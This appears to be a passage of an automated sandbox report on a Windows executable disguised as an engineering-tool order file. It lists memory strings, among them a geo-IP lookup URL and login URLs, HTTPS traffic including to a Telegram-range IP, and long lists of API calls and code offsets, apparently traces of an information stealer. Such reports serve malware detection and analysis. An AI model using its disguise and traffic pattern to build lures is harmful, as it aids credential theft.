            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363A7000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.187
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036372000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.187$
            Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
            Source: unknown; HTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49708 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49709 version: TLS 1.2
            Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49720 version: TLS 1.2
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe; Code function: 0_2_00405054 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe; Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe; Code function: 11_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E7E9811_2_385E7E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E1E9811_2_385E1E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EBB9211_2_385EBB92
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E719011_2_385E7190
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EDB9011_2_385EDB90
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E119111_2_385E1191
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E8B9111_2_385E8B91
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E958811_2_385E9588
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E048911_2_385E0489
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E7E8911_2_385E7E89
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EB28011_2_385EB280
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EFB8011_2_385EFB80
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E718011_2_385E7180
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EA28011_2_385EA280
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EDB8111_2_385EDB81
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E38B811_2_385E38B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E52B911_2_385E52B9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E2BB011_2_385E2BB0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EE4B011_2_385EE4B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EC4B011_2_385EC4B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E1EA811_2_385E1EA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E38A811_2_385E38A8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E11A011_2_385E11A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EBBA011_2_385EBBA0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385E2BA011_2_385E2BA0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_385EE4A011_2_385EE4A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C861E811_2_38C861E8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8D97011_2_38C8D970
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C836C811_2_38C836C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8E7C811_2_38C8E7C8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A4C911_2_38C8A4C9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8CFCF11_2_38C8CFCF
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8BCC011_2_38C8BCC0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C879C011_2_38C879C0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A4D811_2_38C8A4D8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C83FD811_2_38C83FD8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C860D811_2_38C860D8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C804D011_2_38C804D0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C879D011_2_38C879D0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8FAD711_2_38C8FAD7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C83FE811_2_38C83FE8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8FAE811_2_38C8FAE8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C81FEA11_2_38C81FEA
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8CFE011_2_38C8CFE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C80DE011_2_38C80DE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C88CE011_2_38C88CE0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8B7E711_2_38C8B7E7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C81FF811_2_38C81FF8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8B7F811_2_38C8B7F8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C816FF11_2_38C816FF
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C80DF011_2_38C80DF0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C88CF011_2_38C88CF0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8E2F111_2_38C8E2F1
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C848F711_2_38C848F7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C874F711_2_38C874F7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8248811_2_38C82488
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8C18811_2_38C8C188
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C84D8811_2_38C84D88
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8128011_2_38C81280
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8968011_2_38C89680
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8EC8111_2_38C8EC81
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C87E8711_2_38C87E87
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C84D9811_2_38C84D98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C87E9811_2_38C87E98
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8D49811_2_38C8D498
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8669F11_2_38C8669F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8EC9011_2_38C8EC90
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A99011_2_38C8A990
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C82DA811_2_38C82DA8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8D4A811_2_38C8D4A8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C891A911_2_38C891A9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A9A011_2_38C8A9A0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C82DA211_2_38C82DA2
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C856A711_2_38C856A7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C856B811_2_38C856B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C891B811_2_38C891B8
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8E7B911_2_38C8E7B9
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C804BF11_2_38C804BF
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C866B011_2_38C866B0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8BCB011_2_38C8BCB0
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C836B711_2_38C836B7
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C85B4811_2_38C85B48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C89B4811_2_38C89B48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C83B4811_2_38C83B48
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8004011_2_38C80040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8704011_2_38C87040
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8C64011_2_38C8C640
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8F14711_2_38C8F147
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C83B5811_2_38C83B58
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8F15811_2_38C8F158
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8AE5911_2_38C8AE59
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C81B5E11_2_38C81B5E
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8D95F11_2_38C8D95F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8C65011_2_38C8C650
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8095011_2_38C80950
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8835011_2_38C88350
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C81B6811_2_38C81B68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8AE6811_2_38C8AE68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8446811_2_38C84468
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C86B6811_2_38C86B68
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8126F11_2_38C8126F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8966F11_2_38C8966F
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8096011_2_38C80960
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8836011_2_38C88360
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8447811_2_38C84478
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C86B7811_2_38C86B78
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8247811_2_38C82478
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8C17811_2_38C8C178
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8490811_2_38C84908
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8750811_2_38C87508
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8CB0911_2_38C8CB09
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8E30011_2_38C8E300
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A00011_2_38C8A000
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8290711_2_38C82907
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8291811_2_38C82918
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8CB1811_2_38C8CB18
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8881811_2_38C88818
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8171011_2_38C81710
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8A01011_2_38C8A010
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8F61011_2_38C8F610
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8001211_2_38C80012
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8522811_2_38C85228
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8882811_2_38C88828
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8322811_2_38C83228
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8DE2911_2_38C8DE29
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8F62011_2_38C8F620
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8B32111_2_38C8B321
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8522211_2_38C85222
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8323811_2_38C83238
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8DE3811_2_38C8DE38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C85B3811_2_38C85B38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C89B3811_2_38C89B38
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8B33011_2_38C8B330
            Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeCode function: 11_2_38C8703111_2_38C87031
